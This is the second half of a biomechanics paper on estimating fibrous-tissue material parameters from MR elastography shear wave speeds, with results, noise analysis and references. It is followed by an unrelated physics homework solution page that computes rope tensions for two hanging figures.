isotropic shear modulus, $μ0=1$ kPa; density $ρ$ = 1000 kg/m3; initial anisotropy ratio, $k1/μ0=2$; nonlinearity parameter, $k2=5$; fiber dispersion parameter, $κ=1/12;$ and ratio of bulk modulus to initial shear modulus, $K/μ0=104$. To obtain either slow or fast shear waves, a harmonic displacement (simple shear case) or harmonic force (lengthening/shortening cases) was imposed to the top surface in the corresponding polarization direction, defined by the $ms$ or $mf$ unit vector, respectively. The LFE method [25] was applied to estimate the wavelength (and thus wave speed) from simulated data. LFE provides an estimate of wave speed at each “voxel” in a discretized version of the 3D wave field. The mean values and standard deviations of wave speeds from all voxels in a central region of interest are used to generate the symbols and error bars in plots [25,26]. The LFE parameters used in this study are $ρ0=1$ for the center frequency and $L0=11$ for the number of filters [26].
## 3 Results: Shear Wave Speeds in Undeformed and Deformed Configurations
Figure 6 shows the simulation results for slow and fast shear waves propagating in the negative Z-direction in the undeformed configuration and with shear predeformation in the $YZ$- or $XZ$-plane. Shear predeformation in either the $YZ−$ or $XZ$-plane (Figs. 6(e) and 6(f)) increases the wavelength of the fast shear wave compared to the undeformed configuration (Fig. 6(d)), corresponding to an increase in the fast wave speed.
Fig. 6
Fig. 6
Close modal
Shear wave speeds are compared in analytical predictions and simulations estimations for the three configurations of Figs. 4 and 5, shown in Figs. 710 below. In each configuration, one parameter was varied while holding the remaining parameters at the default parameter values given above. The vertical axes of the panels in the top row of each figure display $cf/c0$, the normalized ratio between the fast shear wave speed and the initial wave speed $c0=μ0/ρ$, where $μ0=1000 Pa$ is the initial isotropic shear modulus, $ρ$ is the density of material. Similarly, the vertical axes of the panels on the bottom row of each figure depict the ratio $cs/c0$ between the slow shear wave speed and the initial wave speed. Results are shown for ranges of the HGO parameters isotropic shear modulus $μ$, HGO model parameters $k1 and k2,$ dispersion parameter $κ,$ and the imposed shear, $γ$. In all three figures, solid lines without error bars (orange in online version) depict the analytical predictions, and solid lines with error bars (blue in online version) display corresponding wave speeds estimated from FE simulations.
Fig. 7
Fig. 7
Close modal
Fig. 8
Fig. 8
Close modal
Fig. 9
Fig. 9
Close modal
Fig. 10
Fig. 10
Close modal
### 3.1 One Family of Fibers in the Undeformed Configuration.
Figure 7 shows the relationships between shear wave speeds and the parameters in the HGO model in the undeformed configuration. The horizontal axis represents three normalized parameters ($μ/μ0, k1/μ0, κ)$ in HGO model. There is no effect of changing $k2$ or $γ$ because no predeformation is applied. The fast wave speed increases with increasing $k1$ and $μ$ and decreases with increasing $κ$. In contrast, the slow wave speed is affected only by $μ$.
### 3.2 One Fiber Family With Predeformation by Simple Shear in the $YZ$-Plane.
Figure 8 shows the dependence of wave speed on HGO parameters when simple shear predeformation is imposed in the $YZ$-plane, i.e., in the direction that induces the fiber stretch. The horizontal axis of each panel displays values of one of the four parameters ($μ/μ0, k1/μ0, κ,k2$) in the HGO model or the magnitude of shear $γYZ$. The slow and fast wave speeds all increase with the increasing $k1,k2$, $μ$, and $γYZ$, and decrease with the fiber dispersion, $κ$. The fast wave speed is larger than the slow wave speed due to the stiffening effect of the fibers.
### 3.3 One Fiber Family With Predeformation by Simple Shear in the $XZ$-Plane.
The effects of the HGO parameters on shear wave speeds are illustrated in Fig. 9 for the configuration in which predeformation is applied perpendicular to the original fiber axis. The vertical axis of each panel on the top row shows the (normalized) fast wave speed, and on the bottom row depicts slow wave speed. The horizontal axis of each panel shows the value of the HGO model parameter or the magnitude of shear. Wave speed is influenced by all five parameters $μ/μ0, k1/μ0, κ,k2,$ and $γYZ$. Similar to predeformation in the $YZ$-plane, the fast wave speed increases with the increasing $μ/μ0, k1/μ0,k2,γXZ$ and decreases with the increasing $κ$. Slow wave speeds follow the same trend as the fast wave speeds, but to a lesser extent.
### 3.4 One Fiber Family With Predeformation Consisting of Imposed Extension.
The effect of stretch ratio on wave speed is shown in Fig. 10 for the case of imposed extension. Both fast and slow wave speeds increase with stretch ratio and the simulation results agree well with the analytical predictions.
## 4 Estimation of Parameters in the Holzapfel–Gasser–Ogden Model
In Sec. 2.3, we demonstrated that shear wave speeds can be calculated analytically from parameter values of the HGO model, for specific propagation direction and polarization directions. We also confirmed that the analytical solutions agree with simulated wave speeds in a finite cube-shaped domain. Conversely, the parameters of the HGO model can, in principle, be estimated from measured shear wave speeds, for given propagation and polarization directions, in predeformed specimens. In Sec. 4.1, we demonstrate the feasibility of this approach to parameter estimation.
### 4.1 Estimation Method.
The example system is shown in Fig. 11. The angle $ϕ$ of the fiber axis is chosen to be $π/4$ radians from the base of the specimen in the undeformed configuration, as in Figs. 4 and 5. The propagation direction $n$ is along negative Z-axis, and fiber direction $a$ is in the $YZ$-plane. Experiments are separated into two steps. In the first step, the fast wave speed and slow wave speed are measured without predeformation, by applying horizontal, harmonic displacements to the top surface in the fast or slow polarization directions. The slow wave speed is a function of only the isotropic shear modulus, $μ$, and density ρ, but the fast wave speed is a function of $μ, k1,$ and $κ$ (Eq. (19)). In the second step, the fast wave speed and slow wave speed are measured after applying a predeformation of simple shear in the $YZ−$ plane). In this configuration, both fast and slow wave speeds are functions of all five parameters ($μ, k1,k2,κ$, and $γYZ$) (Eq. (20))
$cs0=μ/ρ; cf0=f(k1,μ,κ)$
(19)
$cs=fk1,k2,μ,κ,γYZ; cf=fk1,k2,μ,κ,γYZ$
(20)
Fig. 11
Fig. 11
Close modal
For the analogous situation using imposed extension (stretch ratio $λ$), Eq. (20) can be written as
$cs=fk1,k2,μ,κ,λ;cf=fk1,k2,μ,κ,λ$
(21)
In the proposed experiment, the density $ρ$ of the material is a known value, and the simple shear ratio $γYZ$(or stretch ratio $λ$) can be controlled and measured. For a single value of the predeformation, the four independent linear equations can be solved simultaneously to determine the four independent parameters. If more data are available, the over-determined system can be solved in the least-squares sense. The matlab optimization tool lsqnonlin for solving nonlinear least square problems was used to find parameters that minimized the difference between predicted and measured values of wave speed.
### 4.2 Sensitivity to Noise.
Because experimental data inevitably contain noise or measurement errors, it is necessary to quantify the robustness of parameter estimates. For each wave speed estimate, random noise was applied from a normal distribution, as shown in the following equation:
$cf(noise)=cf(1+ψτ)$
(22)
$cs(noise)=cs(1+ψτ)$
(23)
Here, τ is a random value in the standard normal distribution (mean = 0, standard deviation = 1), and $ψ$ is defined as a noise factor to control the range of noise variance. In this paper, the noise is defined on three levels. Values of $ψ$ = 0.01, 0.02, and 0.03 indicate wave speed variance ranges of $±3.3%,±6.6%, and ±10%$ from the expected values, respectively.
For wave speed data without noise, the material parameters can be determined by four equations corresponding to two configurations, the undeformed configuration and one value of predeformation. However, if wave speed data are noisy, more data are needed. In a Monte Carlo approach, ten additional simulated experiments with different predeformations were added to the original two simulated experiments, and these simulated experiments were repeated 1000 times with different random values. For various noise levels, the mean values ($±$ standard deviation) of all four parameters were calculated (Tables 1 and 2). To improve the accuracy, outliers (greater than three standard deviations from the mean) were excluded from wave speed data.
Table 1
Comparison of HGO model parameter estimates for different noise levels (imposed shear)
Noise level$μ$(Pa)$k1$(Pa)$κ$$k2$
Expected100020000.0835
($ψ$ = 0.01)$1000 ± 11$$2034 ± 367$$0.083 ± 0.023$$5 ± 0.0$
($ψ$ = 0.02)$1000 ± 23$$2050 ± 739$$0.077 ± 0.044$$4.8 ± 0.1$
($ψ$ = 0.03)$1001 ± 34$$2161 ± 1107$$0.079 ± 0.057$$4.7 ± 0.2$
Noise level$μ$(Pa)$k1$(Pa)$κ$$k2$
Expected100020000.0835
($ψ$ = 0.01)$1000 ± 11$$2034 ± 367$$0.083 ± 0.023$$5 ± 0.0$
($ψ$ = 0.02)$1000 ± 23$$2050 ± 739$$0.077 ± 0.044$$4.8 ± 0.1$
($ψ$ = 0.03)$1001 ± 34$$2161 ± 1107$$0.079 ± 0.057$$4.7 ± 0.2$
Table 2
Comparison of HGO model parameter estimates for different noise levels (imposed extension)
Noise level$μ$(Pa)$k1$(Pa)$κ$$k2$
Expected100020000.0835
($ψ$ = 0.01)$1000 ± 11$$2007 ± 390$$0.081 ± 0.023$$4.9 ± 0.1$
($ψ$ = 0.02)$1000 ± 20$$2044 ± 752$$0.077 ± 0.043$$4.7 ± 0.3$
($ψ$ = 0.03)$1002 ± 32$$2068 ± 1125$$0.075 ± 0.050$$4.5 ± 0.5$
Noise level$μ$(Pa)$k1$(Pa)$κ$$k2$
Expected100020000.0835
($ψ$ = 0.01)$1000 ± 11$$2007 ± 390$$0.081 ± 0.023$$4.9 ± 0.1$
($ψ$ = 0.02)$1000 ± 20$$2044 ± 752$$0.077 ± 0.043$$4.7 ± 0.3$
($ψ$ = 0.03)$1002 ± 32$$2068 ± 1125$$0.075 ± 0.050$$4.5 ± 0.5$
As expected, the standard deviation of each parameter estimate increases with noise level. The mean value of some parameters also deviates from the expected value as noise increases. The parameters $k2$ and $μ0$ are relatively insensitive to the noise level; estimates of $k1$ and $κ$ deviate more when noise increases.
## 5 Discussion
In materials that can be modeled as nonlinear, anisotropic, and nearly incompressible, slow and fast wave speeds can be measured from MRE and used to estimate parameters of the material model. In the examples above, theoretical predictions of shear wave speed values in different configurations (undeformed configuration, simple shear in the $XZ$-plane or $YZ$-plane) agreed well with simulation results.
Fast and slow shear wave speeds provide complementary information. The fast shear wave speed is affected by the stiffness of the fibers, while the slow shear wave speed is not. In transversely isotropic materials, displacements in the direction of slow shear wave polarization do not induce fiber stretch. In addition, in the example of this paper, simple shear in the $YZ$-plane (which contains the principal fiber axis, ($a$) directly stretches the fibers and significantly affects fast shear wave speeds. In contrast, simple shear in the $XZ$-plane involves displacements perpendicular to the fibers, and does not stretch the fibers appreciably. The measured wave speed in this condition deviates little from the wave speed in the no predeformation condition. Extension in the Z-direction also stretches the fibers, which increases shear wave speeds.
Using the closed-form expressions for wave speed, and data from either simulations or experiments, we can estimate the parameters of a nonlinear anisotropic material model. Unlike linear elastic materials, predeformation plays an important role in determining wave speeds. Without predeformation, the slow shear wave speed varies only with the isotropic shear modulus $μ$ of material and the fast shear wave depends on $μ, k1,$ and $κ$. If predeformations that stretch the fibers are imposed, the fast shear wave speed depends on all the HGO parameters, $μ,k1,k2,κ,$ as well as the magnitude of the predeformation.
The accuracy of material parameter estimates is affected by the levels of noise in the measured wave speed data. The isotropic shear modulus $μ$ is the least sensitive to noise because it is directly derived from the slow wave speed with no predeformation. For the other three parameters, the nonlinearity $k2$ is less sensitive to noise than $k1$ and $κ$, because $k2$ has fewer interactions with other factors in the experiment.
Among the limitations of this paper, in computing wave speeds we do not impose the bilinearity that excludes fibers from resisting infinitesimal levels of dynamic compressive strain. In practice, this assumption could be avoided by imposing a minimal predeformation greater than the wave amplitude. We have considered the original version of the HGO model, which is still widely used. A new version of HGO model has recently been proposed [27], which might also be analyzed by this approach. Parameter estimates improve, in terms of both increased accuracy and reduced variance, with more MRE experiments. Balancing the desired precision of the result and the cost of experiments must be considered carefully, as in all experimental studies.
Only one fiber family is considered in this paper, but it is plausible to generalize this approach to estimate wave speeds and material parameters in a material with multiple fiber families. Some special cases can be considered qualitatively. For simplicity, consider a second fiber family with $ϕ=−45 deg$. For the situation in which simple shear is imposed in the YZ-plane, one fiber family will be stretched and the other will be compressed. In the original HGO model, fibers in compression $(I4<1)$ do not contribute to the stress or to the strain energy. Therefore, wave speeds in a material with two fiber families would be the same as with one fiber family. For the same reason, if the material is compressed in the Z-direction ($λ < 1$), wave speeds are equal to those in an isotropic material because all fibers are under compression. For the idealized example of imposed extension, adding a second fiber family would simply double the effects of a single fiber family. For other configurations the addition of a second fiber family creates orthotropic material symmetry, instead of the transverse isotropy considered in this paper, and would (in general) require further analysis.
Experimental studies that exploit this approach to characterize fibrous soft tissues are planned for future work; these studies would involve superimposing small amplitude shear waves on large finite deformations. Instead of the idealized simple shear deformations of this paper, dense measurements of actual predeformations would need to be combined with regional measurements of shear wave speed. While challenging, this approach promises the possibility of comprehensive, noninvasive tissue characterization in vivo. Tissue may already be in a predeformed state (like white matter in the brain) [28,29], or quasi-static loading might be imposed by respiration (liver [30]), ocular pressure (eye [31]), or external force (intervertebral disk, muscle or breast [32,33]).
## 6 Conclusion
MR elastography can be used, in principle, to estimate parameters of the HGO material model in soft fibrous materials from the speeds of slow and fast shear waves. To demonstrate the ability to obtain accurate results, closed-form expressions for the wave speeds, as functions of predeformation and material parameters, were derived and confirmed by numerical simulations. These results illustrate the feasibility of a new approach to parameter estimation for nonlinear material models of fibrous soft matter.
## Acknowledgment
Financial support for this study was provided by NSF Grant No. CMMI-1727412, NIH Grant Nos. R01/R56 NS055951 and R01 EB027577.
## Funding Data
• NSF (Funder ID: 10.13039/100000001).
• NIH (Funder ID: 10.13039/100000002).
## Nomenclature
• $a$ =
initial fiber direction vector
•
• $A$ =
elasticity tensor
•
• $c$ =
shear wave speed
•
• $C$ =
Cauchy-Green strain tensor
•
• $cf$ =
fast wave speed under predeformation
•
• $cf0$ =
fast wave speed under no predeformation
•
• $cs$ =
slow wave speed under predeformation
•
• $cs0$ =
slow wave speed under no predeformation
•
• $cf(noise)$ =
slow wave speed with noise
•
• $cs(noise)$ =
slow wave speed with noise
•
• $c0$ =
initial shear wave speed
•
• $E1,E2$ =
two tensile moduli in TI material
•
• F =
•
• $I1$ =
first variant of Cauchy-Green strain tensor
•
• $I4$ =
squared stretch in the fiber direction
•
• $I¯1$ =
modified first variant
•
• $I¯4$ =
modified pseudo-variant
•
• $K$ =
bulk modulus of the material
•
• $k1$ =
initial slope of strain-stress curve in the HGO model
•
• $k2$ =
nonlinearity of strain-stress curve in the HGO model
•
• $L$ =
abbreviation in closed-form expression of HGO model
•
• $L0$ =
number of filters
•
• $m$ =
polarization direction vector
•
• $M$ =
abbreviation in closed-form expression of HGO model
•
• $mf$ =
fast polarization direction
•
• $ms$ =
slow polarization direction
•
• $n$ =
wave propagation direction vector
•
• $N$ =
abbreviation in closed-form expression of HGO model
•
• $Q$ =
acoustic tensor
•
• $W$ =
strain energy function
•
• $γ$ =
shear predeformation
•
• $γXZ$ =
simple shear ratio in $XZ$-plane
•
• $γYZ$ =
simple shear ratio in $YZ$-plane
•
• $ζTI$ =
parameter in TI material model
•
• $θ$ =
angle between fiber and propagation directions
•
• $κ$ =
dispersion parameter of fibers in the HGO model
•
• $λ$ =
stretch ratio in Z-direction
•
• $μ$ =
isotropic shear modulus in the HGO model
•
• $μ0$ =
initial value of isotropic shear modulus in the HGO model
•
• $μ1,μ2$ =
two shear moduli in TI material
•
• $ρ$ =
density of the material
•
• $ρ0$ =
LFE parameter
•
• $τ$ =
random value from normal distribution
•
• $ϕ$ =
deviation angle between fiber direction and wave propagation direction
•
• $ϕTI$ =
parameter in TI material model
•
• $ψ$ =
noise factor in sensitivity analysis
## References
1.
Bensamoun
,
S. F.
,
Charleux
,
F.
,
Debernard
,
L.
,
Themar-Noel
,
C.
, and
Voit
,
T.
,
2015
, “
Elastic Properties of Skeletal Muscle and Subcutaneous Tissues in Duchenne Muscular Dystrophy by Magnetic Resonance Elastography (MRE): A Feasibility Study
,”
IRBM
,
36
(
1
), pp.
4
9
.10.1016/j.irbm.2014.11.002
2.
Chamarthi
,
S. K.
,
Raterman
,
B.
,
Mazumder
,
R.
,
Michaels
,
A.
,
Oza
,
V. M.
,
Hanje
,
J.
,
Bolster
,
B.
,
Jin
,
N.
,
White
,
R. D.
, and
Kolipaka
,
A.
,
2014
, “
Rapid Acquisition Technique for MR Elastography of the Liver
,”
Magn. Reson. Imaging
,
32
(
6
), pp.
679
683
.10.1016/j.mri.2014.02.013
3.
Yang
,
C.
,
Yin
,
M.
,
Glaser
,
K. J.
,
Zhu
,
X.
,
Xu
,
K.
,
Ehman
,
R. L.
, and
Chen
,
J.
,
2017
, “
Static and Dynamic Liver Stiffness: An Ex Vivo Porcine Liver Study Using MR Elastography
,”
Magn. Reson. Imaging
,
44
, pp.
92
95
.10.1016/j.mri.2017.08.009
4.
Kolipaka
,
A.
,
Wassenaar
,
P. A.
,
Cha
,
S.
,
Marashdeh
,
W. M.
,
Mo
,
X.
,
Kalra
,
P.
,
Gans
,
B.
,
Raterman
,
B.
, and
Bourekas
,
E.
,
2018
, “
Magnetic Resonance Elastography to Estimate Brain Stiffness: Measurement Reproducibility and Its Estimate in Pseudotumor Cerebri Patients
,”
Clin. Imaging
,
51
, pp.
114
122
.10.1016/j.clinimag.2018.02.005
5.
Guo
,
J.
,
Hirsch
,
S.
,
Scheel
,
M.
,
Braun
,
J.
, and
Sack
,
I.
,
2016
, “
Three-Parameter Shear Wave Inversion in MR Elastography of Incompressible Transverse Isotropic Media: Application to In Vivo Lower Leg Muscles
,”
Magn. Reson. Med.
,
75
(
4
), pp.
1537
1545
.10.1002/mrm.25740
6.
Labus
,
K. M.
, and
Puttlitz
,
C. M.
,
2016
, “
An Anisotropic Hyperelastic Constitutive Model of Brain White Matter in Biaxial Tension and Structural-Mechanical Relationships
,”
J. Mech. Behav. Biomed. Mater.
,
62
, pp.
195
208
.10.1016/j.jmbbm.2016.05.003
7.
Schmidt
,
J. L.
,
Tweten
,
D. J.
,
,
A. A.
,
Reiter
,
A. J.
,
Okamoto
,
R. J.
,
Garbow
,
J. R.
, and
Bayly
,
P. V.
,
2018
, “
Measurement of Anisotropic Mechanical Properties in Porcine Brain White Matter Ex Vivo Using Magnetic Resonance Elastography
,”
J. Mech. Behav. Biomed. Mater.
,
79
, pp.
30
37
.10.1016/j.jmbbm.2017.11.045
8.
Darvish
,
K. K.
, and
Crandall
,
J. R.
,
2001
, “
Nonlinear Viscoelastic Behavior of Brain Tissue in Oscillatory Shear Deformation
,”
Methods
,
23
, pp.
633
645
.10.1016/S1350-4533(01)00101-1
9.
Panda
,
S. K.
, and
Buist
,
M. L.
,
2018
, “
A Finite Nonlinear Hyper-Viscoelastic Model for Soft Biological Tissues
,”
J. Biomech.
,
69
, pp.
121
128
.10.1016/j.jbiomech.2018.01.025
10.
Ghazy
,
M.
,
Elgindi
,
M. B.
, and
Wei
,
D.
,
2018
, “
Analytical and Numerical Investigations of the Collapse of Blood Vessels With Nonlinear Wall Material Embedded in Nonlinear Soft Tissues
,”
Alexandria Eng. J.
,
57
(
4
), pp.
931
965
.10.1016/j.aej.2018.03.002
11.
Volokh
,
K. Y.
,
2011
, “
Modeling Failure of Soft Anisotropic Materials With Application to Arteries
,”
J. Mech. Behav. Biomed. Mater.
,
4
(
8
), pp.
1582
1594
.10.1016/j.jmbbm.2011.01.002
12.
Shearer
,
T.
,
2015
, “
A New Strain Energy Function for the Hyperelastic Modelling of Ligaments and Tendons Based on Fascicle Microstructure
,”
J. Biomech.
,
48
(
2
), pp.
290
297
.10.1016/j.jbiomech.2014.11.031
13.
Ogden
,
R. W.
,
1997
, “
Wave and Vibrations
,”
Non-Linear Elastic Deformations
,
E. Horwood
,
Chichester, UK
, p.
473
.
14.
Volokh
,
K.
,
2016
, “
Plane Waves in Incompressible Material
,”
Mechanics of Soft Materials
,
Springer
,
Singapore
, p.
96
.
15.
Birch
,
F.
,
1961
, “
The Velocity of Compressional Waves in Rocks to 10 Kilobars—Part 2
,”
J. Geophys. Res.
,
66
(
7
), pp.
2199
2224
.10.1029/JZ066i007p02199
16.
Tweten
,
D. J.
,
Okamoto
,
R. J.
,
Schmidt
,
J. L.
,
Garbow
,
J. R.
, and
Bayly
,
P. V.
,
2015
, “
Estimation of Material Parameters From Slow and Fast Shear Waves in an Incompressible, Transversely Isotropic Material
,”
J. Biomech.
,
48
(
15
), pp.
4002
4009
.10.1016/j.jbiomech.2015.09.009
17.
Holzapfel
,
G.
,
2000
,
Nonlinear Solid Mechanics: A Continuum Approach for Engineering
,
Wiley
,
Chichester, UK
.
18.
Namani
,
R.
,
Feng
,
Y.
,
Okamoto
,
R. J.
,
Sakiyama Elbert
,
S. E.
,
Genin
,
G. M.
, and
Bayly
,
P. V.
,
2012
, “
Elastic Characterization of Transversely Isotropic Soft Materials by Dynamic Shear and Asymmetric Indentation
,”
ASME J. Biomech. Eng.
,
134
(
6
), p.
061004
.10.1115/1.4006848
19.
Sundararaghavan
,
H. G.
,
Monteiro
,
G. A.
,
Lapin
,
N. A.
,
Chabal
,
Y. J.
,
Miksan
,
J. R.
, and
Shreiber
,
D. I.
,
2008
, “
Genipin-Induced Changes in Collagen Gels: Correlation of Mechanical Properties to Fluorescence
,”
J. Biomed. Mater. Res.—Part A
,
87
(
2
), pp.
308
320
.10.1002/jbm.a.31715
20.
Zhang
,
Y.
,
Xu
,
B.
, and
Chow
,
M. J.
,
2011
, “
Experimental and Modeling Study of Collagen Scaffolds With the Effects of Crosslinking and Fiber Alignment
,”
Int. J. Biomater.
,
2011
, p.
172389
.10.1155/2011/172389
21.
Lai
,
V. K.
,
Lake
,
S. P.
,
Frey
,
C. R.
,
Tranquillo
,
R. T.
, and
Barocas
,
V. H.
,
2012
, “
Mechanical Behavior of Collagen-Fibrin Co-Gels Reflects Transition From Series to Parallel Interactions With Increasing Collagen Content
,”
ASME J. Biomech. Eng.
,
134
(
1
), p.
011004
.10.1115/1.4005544
22.
Goriely
,
A.
,
Geers
,
M. G. D.
,
Holzapfel
,
G. A.
,
Jayamohan
,
J.
,
Jérusalem
,
A.
,
Sivaloganathan
,
S.
,
Squier
,
W.
,
van Dommelen
,
J. A. W.
,
Waters
,
S.
, and
Kuhl
,
E.
,
2015
, “
Mechanics of the Brain: Perspectives, Challenges, and Opportunities
,”
Biomech. Model. Mechanobiol.
,
14
(
5
), pp.
931
965
.10.1007/s10237-015-0662-4
23.
Budday
,
S.
,
Sommer
,
G.
,
Holzapfel
,
G. A.
,
Steinmann
,
P.
, and
Kuhl
,
E.
,
2017
, “
Viscoelastic Parameter Identification of Human Brain Tissue
,”
J. Mech. Behav. Biomed. Mater.
,
74
, pp.
463
476
.10.1016/j.jmbbm.2017.07.014
24.
Okamoto
,
R. J.
,
Moulton
,
M. J.
,
Peterson
,
S. J.
,
Li
,
D.
,
Pasque
,
M. K.
, and
Guccione
,
J. M.
,
2000
, “
Epicardial Suction: A New Approach to Mechanical Testing of the Passive Ventricular Wall
,”
ASME J. Biomech. Eng.
,
122
(
5
), pp.
479
487
.10.1115/1.1289625
25.
Knutsson
,
H.
,
Westin
,
C. F.
, and
Granlund
,
G.
,
1994
, “
Local Multiscale Frequency and Bandwidth Estimation
,”
International Conference on Image Processing
(
ICIP
), Austin, TX, Nov. 13–16, pp.
36
40
.10.1109/ICIP.1994.413270
26.
Okamoto
,
R. J.
,
Johnson
,
C. L.
,
Feng
,
Y.
,
,
J. G.
, and
Bayly
,
P. V.
,
2014
, “
MRE Detection of Heterogeneity Using Quantitative Measures of Residual Error and Uncertainty
,”
Proc. SPIE
,
9038
, p.
90381E
. 10.1117/12.2044633
27.
Li
,
K.
,
Ogden
,
R. W.
, and
Holzapfel
,
G. A.
,
2018
, “
Modeling Fibrous Biological Tissues With a General Invariant That Excludes Compressed Fibers
,”
J. Mech. Phys. Solids
,
110
, p.
011004
.10.1016/j.jmps.2017.09.005
28.
Xu
,
G.
,
Bayly
,
P. V.
, and
Taber
,
L. A.
,
2009
, “
Residual Stress in the Adult Mouse Brain
,”
Biomech. Model. Mechanobiol.
,
8
(
4
), pp.
253
262
.10.1007/s10237-008-0131-4
29.
Xu
,
G.
,
Knutsen
,
A. K.
,
Dikranian
,
K.
,
Kroenke
,
C. D.
,
Bayly
,
P. V.
, and
Taber
,
L. A.
,
2010
, “
Axons Pull on the Brain, but Tension Does Not Drive Cortical Folding
,”
ASME J. Biomech. Eng.
,
132
(
7
), p.
071013
.10.1115/1.4001683
30.
Yun
,
M. H.
,
Seo
,
Y. S.
,
Kang
,
H. S.
,
Lee
,
K. G.
,
Kim
,
J. H.
,
An
,
H.
,
Yim
,
H. J.
,
Keum
,
B.
,
Jeen
,
Y. T.
,
Lee
,
H. S.
,
Chun
,
H. J.
,
Um
,
S. H.
,
Kim
,
C. D.
, and
Ryu
,
H. S.
,
2011
, “
The Effect of the Respiratory Cycle on Liver Stiffness Values as Measured by Transient Elastography
,”
J. Viral Hepat.
,
18
(
9
), pp.
631
636
.10.1111/j.1365-2893.2010.01376.x
31.
Nguyen
,
T.-M.
,
Arnal
,
B.
,
Song
,
S.
,
Huang
,
Z.
,
Wang
,
R. K.
, and
O'Donnell
,
M.
,
2015
, “
Shear Wave Elastography Using Amplitude-Modulated Acoustic Radiation Force and Phase-Sensitive Optical Coherence Tomography
,”
J. Biomed. Opt.
,
20
(
1
), p.
016001
.10.1117/1.JBO.20.1.016001
32.
Chan
,
D. D.
,
Gossett
,
P. C.
,
Butz
,
K. D.
,
Nauman
,
E. A.
, and
Neu
,
C. P.
,
2014
, “
Comparison of Intervertebral Disc Displacements Measured Under Applied Loading With MRI at 3.0 T and 9.4 T
,”
J. Biomech.
,
47
(
11
), pp.
2801
2806
.10.1016/j.jbiomech.2014.05.026
33.
Capilnasiu
,
A.
,
,
M.
,
Fovargue
,
D.
,
Patel
,
D.
,
Holub
,
O.
,
Bilston
,
L.
,
Screen
,
H.
,
Sinkus
,
R.
, and
Nordsletten
,
D.
,
2019
, “
Magnetic Resonance Elastography in Nonlinear Viscoelastic Materials Under Load
,”
Biomech. Model. Mechanobiol.
,
18
(
1
), pp.
111
135
.10.1007/s10237-018-1072-1 | 2022-06-27 03:21:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 411, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6153632998466492, "perplexity": 2183.357579159436}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103324665.17/warc/CC-MAIN-20220627012807-20220627042807-00528.warc.gz"} |
https://collegephysicsanswers.com/openstax-solutions/figure-438-shows-superhero-and-trusty-sidekick-hanging-motionless-rope-0 | Question
Figure 4.38 shows Superhero and Trusty Sidekick hanging motionless from a rope. Superhero’s mass is 90.0 kg, while Trusty Sidekick’s is 55.0 kg, and the mass of the rope is negligible. (a) Draw a free-body diagram of the situation showing all forces acting on Superhero, Trusty Sidekick, and the rope. (b) Find the tension in the rope above Superhero. (c) Find the tension in the rope between Superhero and Trusty Sidekick. Indicate on your free-body diagram the system of interest used to solve each part.
Question Image
1. See the video for freebody diagrams.
2. $1420 \textrm{ N}$
3. $539 \textrm{ N}$
Solution Video
# OpenStax College Physics Solution, Chapter 4, Problem 34 (Problems & Exercises) (5:00)
#### Sign up to view this solution video!
View sample solution
## Calculator Screenshots
Video Transcript
This is College Physics Answers with Shaun Dychko. Our first job in this question is to show all the forces acting on each part of this picture. We have our superhero, which I will denote with subscript <i>s</i> and a trusty sidekick with subscript <i>t</i>. The superhero’s mass is 90 kilograms and the trusty sidekick has a mass of 55 kilograms. And we’re gonna draw a free body diagrams of the top portion of rope, which is just the portion here. And then we'll draw free body diagram of the superhero. And then a free body diagram of this portion of rope here is at the bottom portion. And then a free body diagram of the trusty sidekick. So that's four free body diagrams. So the top portion of rope has a tension force in the top going upwards. That's the force exerted by the ceiling on the rope. And then we have the same magnitude tension force on the top portion of rope directly downwards. I labeled them both the same because they have the same magnitude. And the free body diagram diagram for our superhero has a single force going upwards, which is this tension in the top portion of rope, and two forces down; one is the tension in the bottom portion of rope pulling down, and he also has the force of gravity on the superhero. So there’s two forces downwards. The bottom portion of rope has a tension in the bottom portion of rope upwards and downwards. And the trusty sidekick has only two forces on him; the tension in the bottom portion of rope upwards, and the force of gravity on the trusty sidekick downwards. So in part B. We're going to figure out what is this tension force in the top portion of rope. So consider both of these free body diagrams; one for the superhero and one for the trusty sidekick. We're going to create, you know Newton’s second law equations for each of them, howing that all the net forces are zero in both pictures. So in the first picture, we have the tension force at the top portion of rope directed upwards, so it’s positive. And then minus the tension in the bottom portion of rope pulling the superhero down. And then minus also the force of gravity on the superhero, which is the superhero’s mass times acceleration due to gravity. And all of that equals zero because the superhero is stationary and not accelerating. And for the second picture which we need because this equation one we can’t solve it, because there are two unknowns. We don't know the tension in the top portion of rope nor do we know the tension in the bottom portion of rope. So we only have a single equation with two unknowns. It means you need to look for a second equation in order to substitute for one of these unknowns with something that you do know. So in equation two we're gonna create that substitution. We're gonna say that the tension force in the bottom portion of rope directed upwards, minus the force of gravity on the trusty sidekick; mass of the trusty sidekick times <i>g</i> equals zero. And we can rearrange that for equation two version b, where we’ve added the force of gravity on the trusty sidekick to both sides. So it cancels on the left and we're left with force of tension on the bottom portion of rope is the force of gravity on the trusty sidekick. And so this is something we can plug-in into equation one. So equation one version b, I’ve re-written equation one, but I’ve written a substitution in red here where instead of <i>f t b</i>, I’ve written <i>m t g</i> in it’s place. And this is something that we know. And so now this is an equation with only one unknown and I will solve for it. So we'll add <i>m t g</i> and <i>m s g</i> to both sides. And also factor out the <i>g</i>, common factor <i>g</i> from these two terms. And we’re left with the force of tension in the top portion of rope is, gravitational field strength times the sum of the masses of the two good guys. So it’s 9.80 newtons per kilogram times 55 kilograms plus 90 kilograms, which is 1420 newtons when you have three significant figures. This is 9.80 here. So that answers part B, and then part C says, what is the force of tension in the bottom portion of rope? And we already said here in equation two version b that it’s the weight of the trusty sidekick. So calculate that weight by taking 55 kilograms times 9.8 newtons per kilogram, which is 539 newtons. | 